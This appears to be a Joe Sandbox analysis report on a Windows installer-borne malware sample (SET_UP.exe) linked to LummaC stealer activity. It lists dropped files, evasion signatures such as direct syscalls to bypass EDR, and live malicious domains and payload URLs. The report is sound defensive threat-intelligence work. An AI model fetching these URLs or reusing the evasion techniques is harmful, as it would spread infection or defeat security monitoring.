process14 file15 62 C:\Users\user\...\IUService.exe (copy), PE32 26->62 dropped 64 C:\Users\user\AppData\...\vcl120.bpl (copy), PE32 26->64 dropped 66 C:\Users\user\AppData\...\rtl120.bpl (copy), PE32 26->66 dropped 68 10 other files (none is malicious) 26->68 dropped 29 IUService.exe 26->29         started        32 cmd.exe 1 26->32         started        34 cmd.exe 1 26->34         started        36 5 other processes 26->36 process16 signatures17 90 Tries to detect virtualization through RDTSC time measurements 29->90 92 Switches to a custom stack to bypass stack traces 29->92 94 Found direct / indirect Syscall (likely to bypass EDR) 29->94 38 conhost.exe 32->38         started        40 tasklist.exe 1 32->40         started        42 find.exe 1 32->42         started        44 conhost.exe 34->44         started        52 2 other processes 34->52 46 conhost.exe 36->46         started        48 conhost.exe 36->48         started        50 conhost.exe 36->50         started        54 10 other processes 36->54 process18

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      SET_UP.exe11%VirustotalBrowse
                      SET_UP.exe16%ReversingLabsWin32.Hacktool.Generic

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exe3%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\is-8TLP5.tmp\_isetup\_setup64.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\is-N3BQO.tmp\_isetup\_setup64.tmp0%ReversingLabs
                      C:\Users\user\AppData\Roaming\UltraMedia\IUService.exe (copy)0%ReversingLabs
                      C:\Users\user\AppData\Roaming\UltraMedia\is-36S8B.tmp0%ReversingLabs
                      C:\Users\user\AppData\Roaming\UltraMedia\is-OKBGO.tmp0%ReversingLabs
                      C:\Users\user\AppData\Roaming\UltraMedia\is-RBCNP.tmp0%ReversingLabs
                      C:\Users\user\AppData\Roaming\UltraMedia\is-SQ6C4.tmp0%ReversingLabs
                      C:\Users\user\AppData\Roaming\UltraMedia\is-UIAB4.tmp0%ReversingLabs
                      C:\Users\user\AppData\Roaming\UltraMedia\maddisAsm_.bpl (copy)0%ReversingLabs
                      C:\Users\user\AppData\Roaming\UltraMedia\madexcept_.bpl (copy)0%ReversingLabs
                      C:\Users\user\AppData\Roaming\UltraMedia\rtl120.bpl (copy)0%ReversingLabs
                      C:\Users\user\AppData\Roaming\UltraMedia\vcl120.bpl (copy)0%ReversingLabs

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://laborersquei.click/Fx0%Avira URL Cloudsafe
                      https://laborersquei.click/~0%Avira URL Cloudsafe
                      https://klipsyzogey.shop/av0%Avira URL Cloudsafe
                      https://laborersquei.click/.we0%Avira URL Cloudsafe
                      https://neqi.shop/sdgjyut/psh.txt#100%Avira URL Cloudmalware
                      https://laborersquei.click/.0%Avira URL Cloudsafe
                      https://laborersquei.click/G9udV0%Avira URL Cloudsafe
                      https://laborersquei.click/0%Avira URL Cloudsafe
                      https://klipsyzogey.shop:443/int_clp_sha.txt0%Avira URL Cloudsafe
                      https://laborersquei.click/api&0%Avira URL Cloudsafe
                      laborersquei.click0%Avira URL Cloudsafe
                      https://laborersquei.click/api30%Avira URL Cloudsafe
                      https://laborersquei.click/F0%Avira URL Cloudsafe
                      https://klipsyzogey.shop/int_clp_sha.txt0%Avira URL Cloudsafe
                      https://laborersquei.click/N0%Avira URL Cloudsafe
                      https://laborersquei.click/api0%Avira URL Cloudsafe
                      https://laborersquei.click/UU80%Avira URL Cloudsafe
                      https://klipsyzogey.shop/int_clp_sha.txtG30%Avira URL Cloudsafe
                      https://klipsyzogey.shop/int_clp_sha.txtl0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      laborersquei.click
                      		104.21.89.250
                      		truetrue
                        		unknown
                        klipsyzogey.shop
                        		172.67.214.186
                        		truefalse
                          		unknown
                          neqi.shop
                          		unknown
                          		unknownfalse
                            		high

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            curverpluch.latfalse
                              		high
                              slipperyloo.latfalse
                                		high
                                tentabatte.latfalse
                                  		high
                                  manyrestro.latfalse
                                    		high
                                    bashfulacid.latfalse
                                      		high
                                      wordyfindy.latfalse
                                        		high
                                        shapestickyr.latfalse
                                          		high
                                          laborersquei.clicktrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://klipsyzogey.shop/int_clp_sha.txtfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          talkynicer.latfalse
                                            		high
                                            https://laborersquei.click/apitrue
                                            • Avira URL Cloud: safe
                                            		unknown

                                            URLs from Memory and Binaries

                                            NameSourceMaliciousAntivirus DetectionReputation
                                            https://duckduckgo.com/chrome_newtabSET_UP.exe, 00000000.00000003.1803808665.0000000003569000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1803894177.0000000003567000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUSET_UP.exe, 00000000.00000003.1979005683.0000000003990000.00000004.00000800.00020000.00000000.sdmp, VER7RSX5CP4YEKECQGJ84KT.exe, 00000004.00000000.2098145757.0000000000321000.00000020.00000001.01000000.00000006.sdmp, VER7RSX5CP4YEKECQGJ84KT.exe.0.drfalse
                                                		high
                                                https://laborersquei.click/G9udVSET_UP.exe, 00000000.00000003.1826848306.0000000003526000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://duckduckgo.com/ac/?q=SET_UP.exe, 00000000.00000003.1803808665.0000000003569000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1803894177.0000000003567000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://ocsp.sectigo.com0SET_UP.exe, is-36S8B.tmp.7.dr, is-SQ6C4.tmp.7.dr, is-UIAB4.tmp.7.dr, is-RBCNP.tmp.7.drfalse
                                                    		high
                                                    https://klipsyzogey.shop:443/int_clp_sha.txtSET_UP.exe, 00000000.00000003.2091901198.0000000000837000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://schemas.xmlsoap.org/soap/envelope/VER7RSX5CP4YEKECQGJ84KT.tmp, 00000007.00000003.2293843395.00000000082F0000.00000004.00001000.00020000.00000000.sdmp, IUService.exe, 00000022.00000002.2353924562.0000000059801000.00000020.00000001.01000000.0000000B.sdmp, is-UIAB4.tmp.7.drfalse
                                                      		high
                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=SET_UP.exe, 00000000.00000003.1804007510.0000000003568000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1803808665.0000000003569000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1803894177.0000000003567000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17SET_UP.exe, 00000000.00000003.1804358523.00000000035C1000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1827141410.0000000003575000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1804543309.0000000003575000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1826974677.0000000003575000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#SET_UP.exe, is-36S8B.tmp.7.dr, is-SQ6C4.tmp.7.dr, is-UIAB4.tmp.7.dr, is-RBCNP.tmp.7.drfalse
                                                            		high
                                                            https://laborersquei.click/SET_UP.exe, 00000000.00000003.1826911184.00000000008B7000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1851412519.000000000352C000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1827023750.000000000352E000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1849198873.00000000008B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://laborersquei.click/FxSET_UP.exe, 00000000.00000003.1803136809.0000000000850000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://laborersquei.click/~SET_UP.exe, 00000000.00000003.1898087172.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1826911184.00000000008B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://klipsyzogey.shop/avSET_UP.exe, 00000000.00000002.2099859671.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1973689658.00000000008B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://neqi.shop/sdgjyut/psh.txtSET_UP.exe, 00000000.00000002.2099859671.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1973689658.00000000008B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://laborersquei.click/api&SET_UP.exe, 00000000.00000003.1826911184.0000000000899000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://neqi.shop/sdgjyut/psh.txt#SET_UP.exe, 00000000.00000002.2099859671.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1973689658.00000000008B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              https://www.remobjects.com/psVER7RSX5CP4YEKECQGJ84KT.exe, 00000004.00000003.2101675445.000000000333F000.00000004.00001000.00020000.00000000.sdmp, VER7RSX5CP4YEKECQGJ84KT.exe, 00000004.00000003.2105415101.000000007EEDB000.00000004.00001000.00020000.00000000.sdmp, VER7RSX5CP4YEKECQGJ84KT.tmp, 00000005.00000000.2108717164.00000000008C1000.00000020.00000001.01000000.00000007.sdmp, VER7RSX5CP4YEKECQGJ84KT.tmp, 00000007.00000000.2131734150.0000000000B5D000.00000020.00000001.01000000.00000009.sdmp, VER7RSX5CP4YEKECQGJ84KT.tmp.4.drfalse
                                                                		high
                                                                http://x1.c.lencr.org/0SET_UP.exe, 00000000.00000003.1849682302.0000000003540000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://x1.i.lencr.org/0SET_UP.exe, 00000000.00000003.1849682302.0000000003540000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallSET_UP.exe, 00000000.00000003.1804543309.0000000003550000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchSET_UP.exe, 00000000.00000003.1804007510.0000000003568000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1803808665.0000000003569000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1803894177.0000000003567000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.innosetup.com/VER7RSX5CP4YEKECQGJ84KT.exe, 00000004.00000003.2101675445.000000000333F000.00000004.00001000.00020000.00000000.sdmp, VER7RSX5CP4YEKECQGJ84KT.exe, 00000004.00000003.2105415101.000000007EEDB000.00000004.00001000.00020000.00000000.sdmp, VER7RSX5CP4YEKECQGJ84KT.tmp, 00000005.00000000.2108717164.00000000008C1000.00000020.00000001.01000000.00000007.sdmp, VER7RSX5CP4YEKECQGJ84KT.tmp, 00000007.00000000.2131734150.0000000000B5D000.00000020.00000001.01000000.00000009.sdmp, VER7RSX5CP4YEKECQGJ84KT.tmp.4.drfalse
                                                                          		high
                                                                          https://support.mozilla.org/products/firefoxgro.allSET_UP.exe, 00000000.00000003.1850901122.0000000003641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.innosetup.com/SET_UP.exefalse
                                                                              		high
                                                                              https://sectigo.com/CPS0SET_UP.exe, is-36S8B.tmp.7.dr, is-SQ6C4.tmp.7.dr, is-UIAB4.tmp.7.dr, is-RBCNP.tmp.7.drfalse
                                                                                		high
                                                                                https://www.google.com/images/branding/product/ico/googleg_lodp.icoSET_UP.exe, 00000000.00000003.1804007510.0000000003568000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1803808665.0000000003569000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1803894177.0000000003567000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://laborersquei.click/.weSET_UP.exe, 00000000.00000003.1803136809.0000000000850000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://laborersquei.click/.SET_UP.exe, 00000000.00000003.1898087172.00000000008B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=SET_UP.exe, 00000000.00000003.1803808665.0000000003569000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1803894177.0000000003567000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://crl.rootca1.amazontrust.com/rootca1.crl0SET_UP.exe, 00000000.00000003.1849682302.0000000003540000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://laborersquei.click/api3SET_UP.exe, 00000000.00000003.1897227227.00000000008B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sSET_UP.exe, is-36S8B.tmp.7.dr, is-SQ6C4.tmp.7.dr, is-UIAB4.tmp.7.dr, is-RBCNP.tmp.7.drfalse
                                                                                        		high
                                                                                        https://laborersquei.click/FSET_UP.exe, 00000000.00000003.1898087172.00000000008B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        http://ocsp.rootca1.amazontrust.com0:SET_UP.exe, 00000000.00000003.1849682302.0000000003540000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016SET_UP.exe, 00000000.00000003.1804358523.00000000035C1000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1827141410.0000000003575000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1804543309.0000000003575000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1826974677.0000000003575000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://www.ecosia.org/newtab/SET_UP.exe, 00000000.00000003.1804007510.0000000003568000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1803808665.0000000003569000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1803894177.0000000003567000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brSET_UP.exe, 00000000.00000003.1850901122.0000000003641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://ac.ecosia.org/autocomplete?q=SET_UP.exe, 00000000.00000003.1804007510.0000000003568000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1803808665.0000000003569000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1803894177.0000000003567000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tVER7RSX5CP4YEKECQGJ84KT.tmp, 00000007.00000003.2293843395.00000000082F0000.00000004.00001000.00020000.00000000.sdmp, VER7RSX5CP4YEKECQGJ84KT.tmp, 00000007.00000002.2314319057.00000000012EC000.00000004.00000010.00020000.00000000.sdmp, is-36S8B.tmp.7.dr, is-SQ6C4.tmp.7.dr, is-UIAB4.tmp.7.dr, is-RBCNP.tmp.7.drfalse
                                                                                                    		high
                                                                                                    http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#VER7RSX5CP4YEKECQGJ84KT.tmp, 00000007.00000003.2293843395.00000000082F0000.00000004.00001000.00020000.00000000.sdmp, VER7RSX5CP4YEKECQGJ84KT.tmp, 00000007.00000002.2314319057.00000000012EC000.00000004.00000010.00020000.00000000.sdmp, is-36S8B.tmp.7.dr, is-SQ6C4.tmp.7.dr, is-UIAB4.tmp.7.dr, is-RBCNP.tmp.7.drfalse
                                                                                                      		high
                                                                                                      https://laborersquei.click/NSET_UP.exe, 00000000.00000003.1849198873.00000000008B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://support.microsofSET_UP.exe, 00000000.00000003.1804358523.00000000035C3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://crt.rootca1.amazontrust.com/rootca1.cer0?SET_UP.exe, 00000000.00000003.1849682302.0000000003540000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://www.info-zip.org/IUService.exe, 00000022.00000002.2326879519.00000000092BF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://laborersquei.click/UU8SET_UP.exe, 00000000.00000003.1874088390.000000000352C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://klipsyzogey.shop/int_clp_sha.txtlSET_UP.exe, 00000000.00000002.2099859671.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1973689658.00000000008B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://laborersquei.click/fSET_UP.exe, 00000000.00000003.1898087172.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1938865603.00000000008B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              http://www.remobjects.com/psSET_UP.exefalse
                                                                                                                		high
                                                                                                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesSET_UP.exe, 00000000.00000003.1804543309.0000000003550000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=SET_UP.exe, 00000000.00000003.1804007510.0000000003568000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1803808665.0000000003569000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1803894177.0000000003567000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://klipsyzogey.shop/int_clp_sha.txtG3SET_UP.exe, 00000000.00000002.2099859671.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1973689658.00000000008A4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown

                                                                                                                    World Map of Contacted IPs

                                                                                                                    • No. of IPs < 25%
                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                    • 75% < No. of IPs

                                                                                                                    Public IPs

                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                    172.67.214.186
                                                                                                                    		klipsyzogey.shopUnited States
                                                                                                                    		13335CLOUDFLARENETUSfalse
                                                                                                                    104.21.89.250
                                                                                                                    		laborersquei.clickUnited States
                                                                                                                    		13335CLOUDFLARENETUStrue

                                                                                                                    General Information

                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                    Analysis ID:1580732
                                                                                                                    Start date and time:2024-12-25 22:16:10 +01:00
                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                    Overall analysis duration:0h 7m 48s
                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                    Report type:full
                                                                                                                    Cookbook file name:default.jbs
                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                    Number of analysed new started processes analysed:35
                                                                                                                    Number of new started drivers analysed:0
                                                                                                                    Number of existing processes analysed:0
                                                                                                                    Number of existing drivers analysed:0
                                                                                                                    Number of injected processes analysed:0
                                                                                                                    Technologies:
                                                                                                                    • HCA enabled
                                                                                                                    • EGA enabled
                                                                                                                    • AMSI enabled
                                                                                                                    Analysis Mode:default
                                                                                                                    Analysis stop reason:Timeout
                                                                                                                    Sample name:SET_UP.exe
                                                                                                                    Detection:MAL
                                                                                                                    Classification:mal100.troj.spyw.expl.evad.winEXE@56/21@3/2
                                                                                                                    EGA Information:
                                                                                                                    • Successful, ratio: 50%
                                                                                                                    HCA Information:
                                                                                                                    • Successful, ratio: 100%
                                                                                                                    • Number of executed functions: 6
                                                                                                                    • Number of non-executed functions: 384
                                                                                                                    Cookbook Comments:
                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                    • Stop behavior analysis, all processes terminated

                                                                                                                    Warnings

                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                                                                                    • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.63, 4.245.163.56
                                                                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                    • Execution Graph export aborted for target IUService.exe, PID 1284 because there are no executed function
                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                    Simulations

                                                                                                                    Behavior and APIs

                                                                                                                    TimeTypeDescription
                                                                                                                    16:17:12API Interceptor9x Sleep call for process: SET_UP.exe modified

                                                                                                                    Joe Sandbox View / Context

                                                                                                                    IPs

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    172.67.214.186https://os50-card.ru/50Get hashmaliciousUnknownBrowse
                                                                                                                      104.21.89.2506CJfScEKhr.exeGet hashmaliciousAzorult gzRatBrowse
                                                                                                                      • etapackbg.com/css/Sngggz.png

                                                                                                                      Domains

                                                                                                                      No context

                                                                                                                      ASNs

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      CLOUDFLARENETUSF3ePjP272h.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                      • 172.67.220.198
                                                                                                                      00000.ps1Get hashmaliciousLummaCBrowse
                                                                                                                      • 104.21.38.253
                                                                                                                      https://fsharetv.co/Get hashmaliciousUnknownBrowse
                                                                                                                      • 172.67.131.140
                                                                                                                      123.ps1Get hashmaliciousLummaCBrowse
                                                                                                                      • 104.21.90.105
                                                                                                                      https://t.co/aoHJd5qL2sGet hashmaliciousUnknownBrowse
                                                                                                                      • 172.67.174.18
                                                                                                                      https://yungbucksbbq.com/portbiz/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 104.17.25.14
                                                                                                                      https://email.equifaxbreachsettlement.com/c/eJwUys9qtDAQAPCnSY6STLL_DjnIp4GFr-3iLrX0EuLMiMLqWo1r-_al9x-5yDrGo2SnD8YednvYK9m5lhEPSJpaYtPgDk-NUUQKCS3r2MjegQKrAbSy1oLKWmC1UycbkU9asxZW8dfat_G7mTlit3BKdx54TBk-Bnl3XUrTIkwuwAvw27Zlw8808xR7Qh4Tz39OgJ-ZmAdhPOODWJiihuP7y__al5_1Vc5uoPhMfRyFVeuCGdMqkyv9R7hUb6HKb3m4VOUlPxfhX14VoThfb-Favhby6eA3AAD__0qSUF8Get hashmaliciousUnknownBrowse
                                                                                                                      • 1.1.1.1
                                                                                                                      http://assets.website-files.com/65efffe8d4e10d26910f0543/65f65633ab8b2f021b357c18_64146967722.pdfGet hashmaliciousUnknownBrowse
                                                                                                                      • 104.16.123.96
                                                                                                                      https://issuu.com/txbct.com/docs/navex_quote_65169.?fr=xKAE9_zU1NQGet hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 104.17.24.14
                                                                                                                      CLOUDFLARENETUSF3ePjP272h.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                      • 172.67.220.198
                                                                                                                      00000.ps1Get hashmaliciousLummaCBrowse
                                                                                                                      • 104.21.38.253
                                                                                                                      https://fsharetv.co/Get hashmaliciousUnknownBrowse
                                                                                                                      • 172.67.131.140
                                                                                                                      123.ps1Get hashmaliciousLummaCBrowse
                                                                                                                      • 104.21.90.105
                                                                                                                      https://t.co/aoHJd5qL2sGet hashmaliciousUnknownBrowse
                                                                                                                      • 172.67.174.18
                                                                                                                      https://yungbucksbbq.com/portbiz/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 104.17.25.14
                                                                                                                      https://email.equifaxbreachsettlement.com/c/eJwUys9qtDAQAPCnSY6STLL_DjnIp4GFr-3iLrX0EuLMiMLqWo1r-_al9x-5yDrGo2SnD8YednvYK9m5lhEPSJpaYtPgDk-NUUQKCS3r2MjegQKrAbSy1oLKWmC1UycbkU9asxZW8dfat_G7mTlit3BKdx54TBk-Bnl3XUrTIkwuwAvw27Zlw8808xR7Qh4Tz39OgJ-ZmAdhPOODWJiihuP7y__al5_1Vc5uoPhMfRyFVeuCGdMqkyv9R7hUb6HKb3m4VOUlPxfhX14VoThfb-Favhby6eA3AAD__0qSUF8Get hashmaliciousUnknownBrowse
                                                                                                                      • 1.1.1.1
                                                                                                                      http://assets.website-files.com/65efffe8d4e10d26910f0543/65f65633ab8b2f021b357c18_64146967722.pdfGet hashmaliciousUnknownBrowse
                                                                                                                      • 104.16.123.96
                                                                                                                      https://issuu.com/txbct.com/docs/navex_quote_65169.?fr=xKAE9_zU1NQGet hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 104.17.24.14

                                                                                                                      JA3 Fingerprints

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      a0e9f5d64349fb13191bc781f81f42e100000.ps1Get hashmaliciousLummaCBrowse
                                                                                                                      • 172.67.214.186
                                                                                                                      • 104.21.89.250
                                                                                                                      123.ps1Get hashmaliciousLummaCBrowse
                                                                                                                      • 172.67.214.186
                                                                                                                      • 104.21.89.250
                                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 172.67.214.186
                                                                                                                      • 104.21.89.250
                                                                                                                      vce exam simulator 2.2.1 crackk.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 172.67.214.186
                                                                                                                      • 104.21.89.250
                                                                                                                      iUKUR1nUyD.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                      • 172.67.214.186
                                                                                                                      • 104.21.89.250
                                                                                                                      j6ks0Fxu6t.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 172.67.214.186
                                                                                                                      • 104.21.89.250
                                                                                                                      wIgjKoo9iI.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 172.67.214.186
                                                                                                                      • 104.21.89.250
                                                                                                                      Canvas of Kings_N6xC-S2.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 172.67.214.186
                                                                                                                      • 104.21.89.250
                                                                                                                      RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                      • 172.67.214.186
                                                                                                                      • 104.21.89.250

                                                                                                                      Dropped Files

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      C:\Users\user\AppData\Local\Temp\is-8TLP5.tmp\_isetup\_setup64.tmpGLD6WIS3RXG4KKYJLK.exeGet hashmaliciousUnknownBrowse
                                                                                                                        #U5b89#U88c5#U7a0b#U5e8f_2.1.0.exeGet hashmaliciousUnknownBrowse
